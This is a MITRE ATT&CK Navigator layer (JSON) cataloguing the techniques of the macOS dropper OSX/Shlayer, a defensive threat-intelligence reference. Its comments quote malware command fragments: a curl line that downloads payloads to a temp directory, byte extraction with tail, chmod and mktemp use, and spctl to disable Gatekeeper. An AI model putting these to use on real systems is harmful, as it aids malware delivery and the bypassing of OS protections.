{"description": "Enterprise techniques used by OSX/Shlayer, ATT&CK software S0402 (v1.4)", "name": "OSX/Shlayer (S0402)", "domain": "enterprise-attack", "versions": {"layer": "4.5", "attack": "17", "navigator": "5.1.0"}, "techniques": [{"techniqueID": "T1548", "showSubtechniques": true}, {"techniqueID": "T1548.004", "comment": "[OSX/Shlayer](https://attack.mitre.org/software/S0402) can escalate privileges to root by asking the user for credentials.(Citation: Carbon Black Shlayer Feb 2019)", "score": 1, "color": "#66b1ff", "showSubtechniques": true}, {"techniqueID": "T1059", "showSubtechniques": true}, {"techniqueID": "T1059.004", "comment": "[OSX/Shlayer](https://attack.mitre.org/software/S0402) can use bash scripts to check the macOS version, download payloads, and extract bytes from files. [OSX/Shlayer](https://attack.mitre.org/software/S0402) uses the command sh -c tail -c +1381... to extract bytes at an offset from a specified file. [OSX/Shlayer](https://attack.mitre.org/software/S0402) uses the curl -fsL \"$url\" >$tmp_path command to download malicious payloads into a temporary directory.(Citation: Carbon Black Shlayer Feb 2019)(Citation: sentinelone shlayer to zshlayer)(Citation: 20 macOS Common Tools and Techniques)(Citation: objectivesee osx.shlayer apple approved 2020)", "score": 1, "color": "#66b1ff", "showSubtechniques": true}, {"techniqueID": "T1140", "comment": "[OSX/Shlayer](https://attack.mitre.org/software/S0402) can base64-decode and AES-decrypt downloaded payloads.(Citation: Carbon Black Shlayer Feb 2019) Versions of [OSX/Shlayer](https://attack.mitre.org/software/S0402) pass encrypted and password-protected code to openssl and then write the payload to the /tmp folder.(Citation: sentinelone shlayer to zshlayer)(Citation: 20 macOS Common Tools and Techniques)", "score": 1, "color": "#66b1ff", "showSubtechniques": false}, {"techniqueID": "T1083", "comment": "[OSX/Shlayer](https://attack.mitre.org/software/S0402) has used the command appDir=\"$(dirname $(dirname \"$currentDir\"))\" and $(dirname \"$(pwd -P)\") to construct installation paths.(Citation: sentinelone shlayer to zshlayer)(Citation: 20 macOS Common Tools and Techniques)", "score": 1, "color": "#66b1ff", "showSubtechniques": false}, {"techniqueID": "T1222", "showSubtechniques": true}, {"techniqueID": "T1222.002", "comment": "[OSX/Shlayer](https://attack.mitre.org/software/S0402) can use the chmod utility to set a file as executable, such as chmod 777 or chmod +x.(Citation: 20 macOS Common Tools and Techniques)(Citation: Carbon Black Shlayer Feb 2019)(Citation: Shlayer jamf gatekeeper bypass 2021)", "score": 1, "color": "#66b1ff", "showSubtechniques": true}, {"techniqueID": "T1564", "comment": "[OSX/Shlayer](https://attack.mitre.org/software/S0402) has used the mktemp utility to make random and unique filenames for payloads, such as export tmpDir=\"$(mktemp -d /tmp/XXXXXXXXXXXX)\" or mktemp -t Installer.(Citation: sentinelone shlayer to zshlayer)(Citation: 20 macOS Common Tools and Techniques)(Citation: Shlayer jamf gatekeeper bypass 2021)", "score": 1, "color": "#66b1ff", "showSubtechniques": true}, {"techniqueID": "T1564.001", "comment": "[OSX/Shlayer](https://attack.mitre.org/software/S0402) has executed a .command script from a hidden directory in a mounted DMG.(Citation: Carbon Black Shlayer Feb 2019)", "score": 1, "color": "#66b1ff", "showSubtechniques": true}, {"techniqueID": "T1564.009", "comment": "[OSX/Shlayer](https://attack.mitre.org/software/S0402) has used a resource fork to hide a compressed binary file of itself from the terminal, Finder, and potentially evade traditional scanners.(Citation: tau bundlore erika noerenberg 2020)(Citation: sentinellabs resource named fork 2020)", "score": 1, "color": "#66b1ff", "showSubtechniques": true}, {"techniqueID": "T1564.011", "comment": "[OSX/Shlayer](https://attack.mitre.org/software/S0402) has used the `nohup` command to instruct executed payloads to ignore hangup signals.(Citation: Shlayer jamf gatekeeper bypass 2021)", "score": 1, "color": "#66b1ff", "showSubtechniques": true}, {"techniqueID": "T1105", "comment": "[OSX/Shlayer](https://attack.mitre.org/software/S0402) can download payloads, and extract bytes from files. [OSX/Shlayer](https://attack.mitre.org/software/S0402) uses the curl -fsL \"$url\" >$tmp_path command to download malicious payloads into a temporary directory.(Citation: Carbon Black Shlayer Feb 2019)(Citation: sentinelone shlayer to zshlayer)(Citation: 20 macOS Common Tools and Techniques)(Citation: objectivesee osx.shlayer apple approved 2020)", "score": 1, "color": "#66b1ff", "showSubtechniques": false}, {"techniqueID": "T1036", "showSubtechniques": true}, {"techniqueID": "T1036.005", "comment": "[OSX/Shlayer](https://attack.mitre.org/software/S0402) can masquerade as a Flash Player update.(Citation: Carbon Black Shlayer Feb 2019)(Citation: Intego Shlayer Feb 2018)", "score": 1, "color": "#66b1ff", "showSubtechniques": true}, {"techniqueID": "T1176", "showSubtechniques": true}, {"techniqueID": "T1176.001", "comment": "[OSX/Shlayer](https://attack.mitre.org/software/S0402) can install malicious Safari browser extensions to serve ads.(Citation: Intego Shlayer Apr 2018)(Citation: Malwarebytes Crossrider Apr 2018)", "score": 1, "color": "#66b1ff", "showSubtechniques": true}, {"techniqueID": "T1553", "showSubtechniques": true}, {"techniqueID": "T1553.001", "comment": "If running with elevated privileges, [OSX/Shlayer](https://attack.mitre.org/software/S0402) has used the spctl command to disable Gatekeeper protection for a downloaded file. [OSX/Shlayer](https://attack.mitre.org/software/S0402) can also leverage system links pointing to bash scripts in the downloaded DMG file to bypass Gatekeeper, a flaw patched in macOS 11.3 and later versions. [OSX/Shlayer](https://attack.mitre.org/software/S0402) has been Notarized by Apple, resulting in successful passing of additional Gatekeeper checks.(Citation: Carbon Black Shlayer Feb 2019)(Citation: Shlayer jamf gatekeeper bypass 2021)(Citation: objectivesee osx.shlayer apple approved 2020)", "score": 1, "color": "#66b1ff", "showSubtechniques": true}, {"techniqueID": "T1082", "comment": "[OSX/Shlayer](https://attack.mitre.org/software/S0402) has collected the IOPlatformUUID, session UID, and the OS version using the command sw_vers -productVersion.(Citation: Carbon Black Shlayer Feb 2019)(Citation: sentinelone shlayer to zshlayer)", "score": 1, "color": "#66b1ff", "showSubtechniques": false}, {"techniqueID": "T1204", "showSubtechniques": true}, {"techniqueID": "T1204.002", "comment": "[OSX/Shlayer](https://attack.mitre.org/software/S0402) has relied on users mounting and executing a malicious DMG file.(Citation: Carbon Black Shlayer Feb 2019)(Citation: Intego Shlayer Feb 2018)", "score": 1, "color": "#66b1ff", "showSubtechniques": true}], "gradient": {"colors": ["#ffffff", "#66b1ff"], "minValue": 0, "maxValue": 1}, "legendItems": [{"label": "used by OSX/Shlayer", "color": "#66b1ff"}]}